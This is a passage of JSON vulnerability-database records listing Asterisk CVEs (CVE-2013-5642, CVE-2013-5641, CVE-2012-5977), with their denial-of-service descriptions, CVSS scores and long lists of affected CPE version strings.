"cpe:2.3:a:asterisk:open_source:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.9.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc1:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:14:22", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5642", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:10.12.1", 
"cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-5642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:14:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL 
pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "cve", "title": "CVE-2013-5641", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-12T03:37:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:39", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.", "cvss3": {}, "published": "2013-01-04T15:55:00", "type": "cve", "title": "CVE-2012-5977", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-02-02T05:10:00", "cpe": ["cpe:/a:digium:asterisk:1.8.2", "cpe:/a:digium:asterisk:10.5.1", "cpe:/a:digium:asterisk:1.8.3.2", "cpe:/a:digium:asterisk:1.8.2.4", "cpe:/a:digium:asterisk:10.5.2", "cpe:/a:digium:asterisk:10.3.1", "cpe:/a:digium:asterisk:10.7.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.3.3", "cpe:/a:digium:certified_asterisk:1.8.11", "cpe:/a:digium:asterisk:1.8.8.1", "cpe:/a:digium:asterisk:1.8.0", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:1.8.4", "cpe:/a:digium:asterisk:1.8.11.1", "cpe:/a:digium:asterisk:1.8.3.1", "cpe:/a:digium:asterisk:1.8.7.0", "cpe:/a:digium:asterisk:1.8.3", "cpe:/a:digium:asterisk:1.8.9.2", "cpe:/a:digium:asterisk:1.8.1.1", "cpe:/a:digium:asterisk:10.1.0", "cpe:/a:digium:asterisk:1.8.10.0", "cpe:/a:digium:asterisk:1.8.15.0", "cpe:/a:digium:asterisk:1.8.6.0", "cpe:/a:digium:asterisk:10.6.0", "cpe:/a:digium:asterisk:1.8.9.3", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:asterisk:1.8.4.1", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:10.3.0", "cpe:/a:digium:asterisk:1.8.14.1", "cpe:/a:digium:asterisk:1.8.5", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:10.6.1", "cpe:/a:digium:asterisk:1.8.4.2", "cpe:/a:digium:asterisk:10.4.1", "cpe:/a:digium:asterisk:10.1.3", "cpe:/a:digium:asterisk:1.8.15.1", "cpe:/a:digium:asterisk:1.8.16.0", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.2.1", "cpe:/a:digium:asterisk:10.5.0", "cpe:/a:digium:asterisk:10.0.1", "cpe:/a:digium:asterisk:1.8.12", "cpe:/a:digium:asterisk:1.8.11.0", "cpe:/a:digium:asterisk:10.10.1", "cpe:/a:digium:asterisk:1.8.12.0", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:1.8.2.2", "cpe:/a:digium:asterisk:10.0.0", "cpe:/a:digium:asterisk:10.8.0", "cpe:/a:digium:asterisk:1.8.9.0", "cpe:/a:digium:asterisk:10.4.0", "cpe:/a:digium:asterisk:1.8.2.3", 
"cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:10.1.1", "cpe:/a:digium:asterisk:1.8.7.1", "cpe:/a:digium:asterisk:1.8.13.0", "cpe:/a:digium:asterisk:10.1.2", "cpe:/a:digium:asterisk:1.8.8.0", "cpe:/a:digium:asterisk:1.8.8.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:10.7.1", "cpe:/a:digium:asterisk:1.8.14.0", "cpe:/a:digium:asterisk:1.8.1", "cpe:/a:digium:asterisk:1.8.13.1", "cpe:/a:digium:asterisk:10.2.0", "cpe:/a:digium:asterisk:1.8.4.4", "cpe:/a:digium:asterisk:1.8.4.3", "cpe:/a:digium:asterisk:1.8.5.0", "cpe:/a:digium:asterisk:10.2.1", "cpe:/a:digium:asterisk:1.8.9.1", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:1.8.1.2", "cpe:/a:digium:asterisk:1.8.10.1", "cpe:/a:digium:asterisk:10.4.2", "cpe:/a:digium:asterisk:10.9.0", "cpe:/a:digium:asterisk:11.0.2"], "id": "CVE-2012-5977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*", 